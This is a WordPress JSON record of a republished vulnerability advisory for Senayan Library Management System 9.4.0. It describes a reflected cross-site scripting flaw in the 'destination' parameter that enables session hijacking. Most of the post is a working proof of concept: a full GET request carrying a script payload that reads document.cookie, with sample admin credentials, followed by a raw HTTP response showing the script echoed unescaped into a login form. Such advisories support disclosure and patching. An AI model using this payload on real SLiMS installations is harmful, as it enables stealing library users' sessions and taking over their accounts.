{"id":34594,"date":"2022-12-10T05:58:09","date_gmt":"2022-12-10T02:58:09","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/170182\/slms940-xss.txt"},"modified":"2022-12-10T13:23:37","modified_gmt":"2022-12-10T09:53:37","slug":"senayan-library-management-system-9-4-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/senayan-library-management-system-9-4-0-cross-site-scripting\/","title":{"rendered":"Senayan Library Management System 9.4.0 Cross Site Scripting"},"content":{"rendered":"

## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9
\nXSS-Reflected- PHPSESSID Hijacking
\n## Author: nu11secur1ty
\n## Date: 12.08.2022
\n## Vendor: https:\/\/slims.web.id\/web\/
\n## Software: https:\/\/slims.web.id\/web\/news\/rilis-9.4.0\/
\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/slims.web.id\/SLIMS-9.4.0<\/p>\n

## Description:
\nThe value of the `destination` request parameter is copied into the
\nvalue of an HTML tag attribute which is encapsulated in double
\nquotation marks.
\nThe payload zbuip”><script>alert(hello_vulnerability)<\/script>jgoihbmmygl
\nwas submitted in the destination parameter.
\nThis input was echoed unmodified in the application’s response. The
\nattacker can hijack the session of some users of the system.<\/p>\n

## STATUS: HIGH Vulnerability<\/p>\n

[+] Payload:<\/p>\n

“`GET
\nGET \/slims9_bulian-9.4.0\/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=Login
\nHTTP\/1.1
\nHost: pwnedhost.com
\nAccept-Encoding: gzip, deflate
\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9
\nAccept-Language: en-US;q=0.9,en;q=0.8
\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64)
\nAppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.5304.107
\nSafari\/537.36
\nConnection: close
\nCache-Control: max-age=0
\nCookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48m
\nOrigin: http:\/\/pwnedhost.com
\nUpgrade-Insecure-Requests: 1
\nReferer: http:\/\/pwnedhost.com\/slims9_bulian-9.4.0\/index.php?p=member
\nSec-CH-UA: “.Not\/A)Brand”;v=”99″, “Google Chrome”;v=”107″, “Chromium”;v=”107″
\nSec-CH-UA-Platform: Windows
\nSec-CH-UA-Mobile: ?0
\n“`
\n[+] Response:<\/p>\n

“`HTTP\/1
\nHTTP\/1.1 200 OK
\nDate: Thu, 08 Dec 2022 18:43:20 GMT
\nServer: Apache\/2.4.54 (Win64) OpenSSL\/1.1.1p PHP\/7.4.30
\nX-Frame-Options: SAMEORIGIN
\nX-Powered-By: PHP\/7.4.30
\nExpires: Thu, 19 Nov 1981 08:52:00 GMT
\nCache-Control: no-store, no-cache, must-revalidate
\nPragma: no-cache
\nX-XSS-Protection: 1; mode=block
\nConnection: close
\nContent-Type: text\/html; charset=UTF-8
\nContent-Length: 30590<\/p>\n

<!–
\n# ===============================
\n# Classic SLiMS Template
\n# ===============================
\n# @Author: Waris Agung Widodo
\n# @Email: ido.alit@gmail.com
\n# @Date: 2018-01-23T11:25:57+07:00
\n# @Last modified by: Waris Agung Widodo
\n# @Last modified time: 2019-01-03T11:25:57+07:00
\n–>
\n<!DOCTYPE html>
\n<html>
\n<head>
\n<meta charset=”utf-8″>
\n<title>Open Source Library Management System | Senayan<\/title>
\n<meta name=”viewport” content=”width=device-width,
\ninitial-scale=1, shrink-to-fit=no”><\/p>\n

<meta http-equiv=”X-UA-Compatible” content=”IE=edge”>
\n<meta http-equiv=”Content-Type” content=”text\/html; charset=utf-8″\/>
\n<meta http-equiv=”Pragma” content=”no-cache”\/>
\n<meta http-equiv=”Cache-Control” content=”no-store, no-cache,
\nmust-revalidate, post-check=0, pre-check=0″\/>
\n<meta http-equiv=”Expires” content=”Sat, 26 Jul 1997 05:00:00 GMT”\/>
\n<meta name=”robots” content=”noindex, follow”> <meta
\nname=”description” content=”Open Source Library Management System |
\nSenayan”>
\n<meta name=”keywords” content=”Open Source Library Management System”>
\n<meta name=”viewport” content=”width=device-width,
\nheight=device-height, initial-scale=1″>
\n<meta name=”generator” content=”SLiMS 9 (Bulian)”>
\n<meta name=”theme-color” content=”#000″><\/p>\n

<meta property=”og:locale” content=”en_US”\/>
\n<meta property=”og:type” content=”book”\/>
\n<meta property=”og:title” content=”Open Source Library Management
\nSystem | Senayan”\/>
\n<meta property=”og:description” content=”Open Source Library
\nManagement System”\/>
\n<meta property=”og:url”
\ncontent=”\/\/pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin”\/>
\n<meta property=”og:site_name” content=”Senayan”\/>
\n<meta property=”og:image”
\ncontent=”\/\/pwnedhost.com\/slims9_bulian-9.4.0\/template\/default\/img\/logo.png”\/><\/p>\n

<meta name=”twitter:card” content=”summary”>
\n<meta name=”twitter:url”
\ncontent=”\/\/pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin”\/>
\n<meta name=”twitter:title” content=”Open Source Library Management
\nSystem | Senayan”\/>
\n<meta property=”twitter:image”
\ncontent=”\/\/pwnedhost.com\/slims9_bulian-9.4.0\/template\/default\/img\/logo.png”\/>
\n<!– \/\/ load bootstrap style –>
\n<link rel=”stylesheet” href=”template\/default\/assets\/css\/bootstrap.min.css”>
\n<!– \/\/ font awesome –>
\n<link rel=”stylesheet”
\nhref=”template\/default\/assets\/plugin\/font-awesome\/css\/fontawesome-all.min.css”>
\n<!– Tailwind CSS –>
\n<link rel=”stylesheet” href=”template\/default\/assets\/css\/tailwind.min.css”>
\n<!– Vegas CSS –>
\n<link rel=”stylesheet”
\nhref=”template\/default\/assets\/plugin\/vegas\/vegas.min.css”>
\n<link href=”\/slims9_bulian-9.4.0\/js\/toastr\/toastr.min.css?31014320″
\nrel=”stylesheet” type=”text\/css”\/>
\n<!– SLiMS CSS –>
\n<link rel=”stylesheet” href=”\/slims9_bulian-9.4.0\/js\/colorbox\/colorbox.css”>
\n<!– \/\/ Flag css –>
\n<link rel=”stylesheet” href=”template\/default\/assets\/css\/flag-icon.min.css”>
\n<!– \/\/ my custom style –>
\n<link rel=”stylesheet”
\nhref=”template\/default\/assets\/css\/style.css?v=20221209-014320″><\/p>\n

<link rel=”shortcut icon” href=”webicon.ico” type=”image\/x-icon”\/><\/p>\n

<!– \/\/ load vue js –>
\n<script src=”template\/default\/assets\/js\/vue.min.js”><\/script>
\n<!– \/\/ load jquery library –>
\n<script src=”template\/default\/assets\/js\/jquery.min.js”><\/script>
\n<!– \/\/ load popper javascript –>
\n<script src=”template\/default\/assets\/js\/popper.min.js”><\/script>
\n<!– \/\/ load bootstrap javascript –>
\n<script src=”template\/default\/assets\/js\/bootstrap.min.js”><\/script>
\n<!– \/\/ load vegas javascript –>
\n<script src=”template\/default\/assets\/plugin\/vegas\/vegas.min.js”><\/script>
\n<script src=”\/slims9_bulian-9.4.0\/js\/toastr\/toastr.min.js”><\/script>
\n<!– \/\/ load SLiMS javascript –>
\n<script src=”\/slims9_bulian-9.4.0\/js\/colorbox\/jquery.colorbox-min.js”><\/script>
\n<script src=”\/slims9_bulian-9.4.0\/js\/gui.js”><\/script>
\n<script src=”\/slims9_bulian-9.4.0\/js\/fancywebsocket.js”><\/script><\/p>\n

<\/head>
\n<body class=”bg-grey-lightest”><\/p>\n

<div class=”result-search page-member-area”>
\n<section id=”section1 container-fluid”>
\n<header class=”c-header”>
\n<div class=”mask”><\/div><\/p>\n

<nav class=”navbar navbar-expand-lg navbar-dark bg-transparent”>
\n<a class=”navbar-brand inline-flex items-center” href=”index.php”>
\n<svg
\nclass=”fill-current text-white inline-block h-8 w-8″
\nversion=”1.1″
\nxmlns=”http:\/\/www.w3.org\/2000\/svg”
\nxmlns:xlink=”http:\/\/www.w3.org\/1999\/xlink”
\nviewBox=”0 0 118.4 135″ style=”enable-background:new 0 0 118.4 135;”
\nxml:space=”preserve”>
\n<path
\nd=”M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1<\/p>\n

l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2<\/p>\n

c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4
\nC118.4,98.6,118.3,98.5,118.3,98.3z
\nM114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6<\/p>\n

L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0
\nc0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8z
\nM95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z”\/>
\n<\/svg>
\n<div class=”inline-flex flex-col leading-tight ml-2″>
\n<h1 class=”text-lg m-0 p-0″>Senayan<\/h1>
\n<\/div>
\n<\/a>
\n<button class=”navbar-toggler” type=”button”
\ndata-toggle=”collapse” data-target=”#navbarSupportedContent”
\naria-controls=”navbarSupportedContent”
\naria-expanded=”false” aria-label=”Toggle navigation”>
\n<span class=”navbar-toggler-icon”><\/span>
\n<\/button><\/p>\n

<div class=”collapse navbar-collapse” id=”navbarSupportedContent”>
\n<ul class=”navbar-nav ml-auto”>
\n<li class=”nav-item “>
\n<a class=”nav-link” href=”index.php”>Home<\/a>
\n<\/li><li class=”nav-item “>
\n<a class=”nav-link” href=”index.php?p=libinfo”>Information<\/a>
\n<\/li><li class=”nav-item “>
\n<a class=”nav-link” href=”index.php?p=news”>News<\/a>
\n<\/li><li class=”nav-item “>
\n<a class=”nav-link” href=”index.php?p=help”>Help<\/a>
\n<\/li><li class=”nav-item “>
\n<a class=”nav-link” href=”index.php?p=librarian”>Librarian<\/a>
\n<\/li> <li class=”nav-item active”>
\n<a class=”nav-link” href=”index.php?p=member”>Member Area<\/a>
\n<\/li>
\n<li class=”nav-item dropdown”>
\n<a class=”nav-link dropdown-toggle
\ncursor-pointer” type=”button” id=”languageMenuButton”
\ndata-toggle=”dropdown” aria-haspopup=”true”
\naria-expanded=”false”>
\n<span class=”flag-icon flag-icon-us”
\nstyle=”border-radius: 2px;”><\/span>
\n<\/a>
\n<div class=”dropdown-menu bg-grey-lighter
\ndropdown-menu-lg-right” aria-labelledby=”dropdownMenuButton”>
\n<h6 class=”dropdown-header”>Select Language : <\/h6>
\n<a class=”dropdown-item”
\nhref=”index.php?select_lang=ar_SA”>
\n<span class=”flag-icon flag-icon-sa mr-2″
\nstyle=”border-radius: 2px;”><\/span> Arabic
\n<\/a> <a class=”dropdown-item” href=”index.php?select_lang=bn_BD”>
\n<span class=”flag-icon flag-icon-bd mr-2″
\nstyle=”border-radius: 2px;”><\/span> Bengali
\n<\/a> <a class=”dropdown-item” href=”index.php?select_lang=pt_BR”>
\n<span class=”flag-icon flag-icon-br mr-2″
\nstyle=”border-radius: 2px;”><\/span> Brazilian Portuguese
\n<\/a> <a class=”dropdown-item” href=”index.php?select_lang=en_US”>
\n<span class=”flag-icon flag-icon-us mr-2″
\nstyle=”border-radius: 2px;”><\/span> English
\n<\/a> <a class=”dropdown-item” href=”index.php?select_lang=es_ES”>
\n<span class=”flag-icon flag-icon-es mr-2″
\nstyle=”border-radius: 2px;”><\/span> Espanol
\n<\/a> <a class=”dropdown-item” href=”index.php?select_lang=de_DE”>
\n<span class=”flag-icon flag-icon-de mr-2″
\nstyle=”border-radius: 2px;”><\/span> German
\n<\/a> <a class=”dropdown-item” href=”index.php?select_lang=id_ID”>
\n<span class=”flag-icon flag-icon-id mr-2″
\nstyle=”border-radius: 2px;”><\/span> Indonesian
\n<\/a> <a class=”dropdown-item” href=”index.php?select_lang=ja_JP”>
\n<span class=”flag-icon flag-icon-jp mr-2″
\nstyle=”border-radius: 2px;”><\/span> Japanese
\n<\/a> <a class=”dropdown-item” href=”index.php?select_lang=my_MY”>
\n<span class=”flag-icon flag-icon-my mr-2″
\nstyle=”border-radius: 2px;”><\/span> Malay
\n<\/a> <a class=”dropdown-item” href=”index.php?select_lang=fa_IR”>
\n<span class=”flag-icon flag-icon-ir mr-2″
\nstyle=”border-radius: 2px;”><\/span> Persian
\n<\/a> <a class=”dropdown-item” href=”index.php?select_lang=ru_RU”>
\n<span class=”flag-icon flag-icon-ru mr-2″
\nstyle=”border-radius: 2px;”><\/span> Russian
\n<\/a> <a class=”dropdown-item” href=”index.php?select_lang=th_TH”>
\n<span class=”flag-icon flag-icon-th mr-2″
\nstyle=”border-radius: 2px;”><\/span> Thai
\n<\/a> <a class=”dropdown-item” href=”index.php?select_lang=tr_TR”>
\n<span class=”flag-icon flag-icon-tr mr-2″
\nstyle=”border-radius: 2px;”><\/span> Turkish
\n<\/a> <a class=”dropdown-item” href=”index.php?select_lang=ur_PK”>
\n<span class=”flag-icon flag-icon-pk mr-2″
\nstyle=”border-radius: 2px;”><\/span> Urdu
\n<\/a> <\/div>
\n<\/li>
\n<\/ul>
\n<\/div>
\n<\/nav>
\n<\/header>
\n<div class=”search” id=”search-wraper”
\nxmlns:v-bind=”http:\/\/www.w3.org\/1999\/xhtml”>
\n<div class=”container”>
\n<div class=”row”>
\n<div class=”col-lg-8 mx-auto”>
\n<div class=”card border-0 shadow”>
\n<div class=”card-body”>
\n<form class=”” action=”index.php” method=”get”
\n@submit.prevent=”searchSubmit”>
\n<input type=”hidden” name=”search” value=”search”>
\n<input ref=”keywords” value=””
\nv-model.trim=”keywords”
\n@focus=”searchOnFocus”
\n@blur=”searchOnBlur” type=”text” id=”search-input”
\nname=”keywords”
\nclass=”input-transparent w-100″ autocomplete=”off”
\nplaceholder=”Enter keyword to
\nsearch collection…”\/>
\n<\/form>
\n<\/div>
\n<\/div>
\n<transition name=”slide-fade”>
\n<div v-if=”show” class=”advanced-wraper shadow
\nmt-4″ id=”advanced-wraper”
\nv-click-outside=”hideSearch”>
\n<p class=”label mb-2″>
\nSearch by : <i
\n@click=”hideSearch”
\nclass=”far fa-times-circle float-right
\ntext-danger cursor-pointer”><\/i>
\n<\/p>
\n<div class=”d-flex flex-wrap”>
\n<a v-bind:class=”{‘btn-primary
\ntext-white’: searchBy === ‘keywords’, ‘btn-outline-secondary’:
\nsearchBy !== ‘keywords’ }”
\n@click=”searchOnClick(‘keywords’)”
\nclass=”btn mr-2 mb-2″>ALL<\/a>
\n<a v-bind:class=”{‘btn-primary
\ntext-white’: searchBy === ‘author’, ‘btn-outline-secondary’: searchBy
\n!== ‘author’ }”
\n@click=”searchOnClick(‘author’)”
\nclass=”btn mr-2 mb-2″>Author<\/a>
\n<a v-bind:class=”{‘btn-primary
\ntext-white’: searchBy === ‘subject’, ‘btn-outline-secondary’: searchBy
\n!== ‘subject’ }”
\n@click=”searchOnClick(‘subject’)”
\nclass=”btn mr-2 mb-2″>Subject<\/a>
\n<a v-bind:class=”{‘btn-primary
\ntext-white’: searchBy === ‘isbn’, ‘btn-outline-secondary’: searchBy
\n!== ‘isbn’ }”
\n@click=”searchOnClick(‘isbn’)”
\nclass=”btn mr-2 mb-2″>ISBN\/ISSN<\/a>
\n<button class=”btn btn-light mr-2 mb-2″
\ndisabled>OR TRY<\/button>
\n<a class=”btn btn-outline-primary mr-2
\nmb-2″ data-toggle=”modal” data-target=”#adv-modal”>Advanced Search<\/a>
\n<\/div>
\n<p v-if=”lastKeywords.length > 0″ class=”label
\nmt-4″>Last search:<\/p>
\n<a
\n:href=”`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`”
\nclass=”flex items-center justify-between
\npy-1 text-decoration-none text-grey-darkest hover:text-blue”
\nv-for=”k in lastKeywords” :key=”k”><span><i
\nclass=”far fa-clock
\ntext-grey-dark mr-2″><\/i><span class=”italic
\ntext-sm”>{{tmpObj[k].text}}<\/span><\/span><i
\nclass=”fas fa-angle-right
\ntext-grey-dark”><\/i><\/a>
\n<\/div>
\n<\/transition>
\n<\/div>
\n<\/div>
\n<\/div>
\n<\/div>
\n<\/section><\/p>\n

<div class=”container py-4″>
\n<div class=”row”>
\n<div class=”col-md-8″>
\n<div>
\n<div class=”tagline”>Library Member Login<\/div>
\n<div class=”loginInfo”>Please insert your member ID
\nand password given by library system administrator. If you are
\nlibrary’s member and don’t have a password yet, please contact library
\nstaff.<\/div>
\n<div class=”loginInfo”>
\n<form
\naction=”index.php?p=member&destination=zbuip”><script>alert(document.cookie)<\/script>jgoihbmmygl”
\nmethod=”post”>
\n<div class=”fieldLabel”>Member ID<\/div><\/p>\n

“`
\n## Reproduce:
\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/slims.web.id\/SLIMS-9.4.0)<\/p>\n

## Proof and Exploit:
\n[href](https:\/\/streamable.com\/dsl863)<\/p>\n

## Time spent
\n`01:30:00`<\/p>\n","protected":false},"excerpt":{"rendered":"

## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9 XSS-Reflected- PHPSESSID Hijacking ## Author: nu11secur1ty ## Date: 12.08.2022 ## Vendor: https:\/\/slims.web.id\/web\/ ## Software: https:\/\/slims.web.id\/web\/news\/rilis-9.4.0\/ ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/slims.web.id\/SLIMS-9.4.0 ## Description: The value of the `destination` request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-34594","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34594","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=34594"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34594\/revisions"}],"predecessor-version":[{"id":34596,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34594\/revisions\/34596"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=34594"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=34594"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=34594"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}